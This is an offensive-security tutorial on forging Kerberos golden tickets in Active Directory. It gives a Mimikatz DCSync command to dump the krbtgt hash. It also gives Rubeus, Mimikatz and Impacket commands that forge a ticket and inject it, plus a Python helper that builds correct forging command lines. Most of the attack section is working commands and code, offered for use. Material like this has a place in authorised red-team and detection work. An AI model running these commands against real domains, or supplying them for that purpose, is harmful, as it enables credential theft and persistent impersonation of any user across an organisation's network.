Golden Tickets

A "golden ticket" is a forged TGT, encrypted and signed with the key of the domain's krbtgt account. A silver ticket (a forged service ticket) can also impersonate any user, but only to the service whose key was used to forge it: a single service, or every service on a single host when that host's machine-account key is used. A golden ticket impersonates any user, to any service, on any machine in the domain, and the krbtgt credentials are never rotated automatically, so a forged TGT keeps working until the krbtgt password has been changed twice (the KDC still accepts tickets under the previous key). For that reason the krbtgt NTLM hash or AES key is probably the single most powerful secret you can obtain, which is why it shows up in DCSync examples so frequently.

A common way to obtain the krbtgt hash is DCSync, run from the context of a domain admin (or any principal holding the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object):

mimikatz # lsadump::dcsync /user:krbtgt /domain:domain.com

With that hash (or AES key) the ticket can be forged offline with Rubeus or Mimikatz. The SID must be the domain SID (S-1-5-21-...-...-...), not a user SID with a trailing RID:

Rubeus.exe golden /aes256:<AES256_KEY> /user:administrator /domain:domain.com /sid:<DOMAIN_SID> /nowrap
mimikatz # kerberos::golden /domain:domain.com /user:Administrator /sid:<DOMAIN_SID> /rc4:<KRBTGT_HASH> /ptt

Mimikatz's /ptt injects the ticket straight into the current logon session. Rubeus prints the ticket as base64 (/nowrap keeps it on one line), and it can then be imported into a fresh network-only logon session; the password given here is never validated locally, so any value works:

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DOMAIN /username:administrator /password:SomethingSecure123! /ticket:doIFLz ... MuaW8=

The same process can be replicated from Linux with the Impacket suite. lookupsid.py recovers the domain SID, and ticketer.py writes Administrator.ccache, which is then selected through the KRB5CCNAME environment variable and used with the -k -no-pass options of the other Impacket tools:

lookupsid.py domain.com/otter@dc01.domain.com -domain-sids
ticketer.py -nthash <KRBTGT_HASH> -domain-sid <DOMAIN_SID> -domain domain.com Administrator
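Two input mistakes silently produce a ticket the KDC rejects: passing a user SID (domain SID plus RID) where the domain SID is expected, and handing an AES256 key to an RC4/NT-hash parameter. The helpers below, added here as an example and not code from the original notes or from Rubeus, Mimikatz or Impacket, normalise the SID, classify the key by its hex length and emit matching ticketer.py and Rubeus command lines. The flag names are the tools' real ones; every hash and SID value in the file is a constructed placeholder.

```python
"""
Input sanity checks before forging a golden ticket.

Added example, not part of the original notes or of Rubeus/Mimikatz/Impacket.
Flag names (-nthash, -aesKey, -domain-sid, /rc4:, /aes256:, /sid:) are the
tools' real ones; all SID and key values below are constructed placeholders.
"""
import re
from typing import List

# A domain SID is S-1-5-21-<a>-<b>-<c>; a user or group SID appends a fourth
# sub-authority, the RID (e.g. -500 for Administrator).
_SID_RE = re.compile(r"^S-1-5-21-(\d+)-(\d+)-(\d+)(?:-(\d+))?$")


def domain_sid(sid: str) -> str:
    """Return the domain SID, dropping a trailing RID if a principal SID was given."""
    m = _SID_RE.match(sid.strip())
    if not m:
        raise ValueError(f"not a domain-rooted SID (S-1-5-21-...): {sid!r}")
    a, b, c, _rid = m.groups()
    return f"S-1-5-21-{a}-{b}-{c}"


def key_kind(key: str) -> str:
    """Classify the krbtgt secret by hex length.

    32 hex chars = 16 bytes, treated as the NT hash (an AES128 key is the same
    size, so pass that explicitly if you know you have one);
    64 hex chars = 32 bytes, an AES256 key.
    """
    k = key.strip().lower()
    if not re.fullmatch(r"[0-9a-f]+", k):
        raise ValueError("key must be hex")
    kinds = {32: "nthash", 64: "aes256"}
    if len(k) not in kinds:
        raise ValueError(f"unexpected key length: {len(k)} hex chars")
    return kinds[len(k)]


def ticketer_cmd(domain: str, sid: str, key: str, user: str = "Administrator") -> List[str]:
    """Build the Impacket ticketer.py argv with the flag matching the key type."""
    flag = "-nthash" if key_kind(key) == "nthash" else "-aesKey"
    return ["ticketer.py", flag, key.strip().lower(),
            "-domain-sid", domain_sid(sid), "-domain", domain, user]


def rubeus_cmd(domain: str, sid: str, key: str, user: str = "Administrator") -> List[str]:
    """Build the Rubeus golden argv with the flag matching the key type."""
    flag = "/rc4:" if key_kind(key) == "nthash" else "/aes256:"
    return ["Rubeus.exe", "golden", f"{flag}{key.strip().lower()}",
            f"/user:{user}", f"/domain:{domain}", f"/sid:{domain_sid(sid)}", "/nowrap"]


if __name__ == "__main__":
    # Constructed values: a user SID (RID 500 present) and a fake AES256 key.
    user_sid = "S-1-5-21-1234567890-987654321-1122334455-500"
    fake_aes256 = "ab" * 32
    fake_nthash = "cd" * 16
    print(" ".join(ticketer_cmd("domain.com", user_sid, fake_aes256)))
    print(" ".join(rubeus_cmd("domain.com", user_sid, fake_nthash)))
```

Both builders call domain_sid(), so a copied-and-pasted user SID is corrected rather than forwarded, and a 64-hex key is never sent to -nthash or /rc4:.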
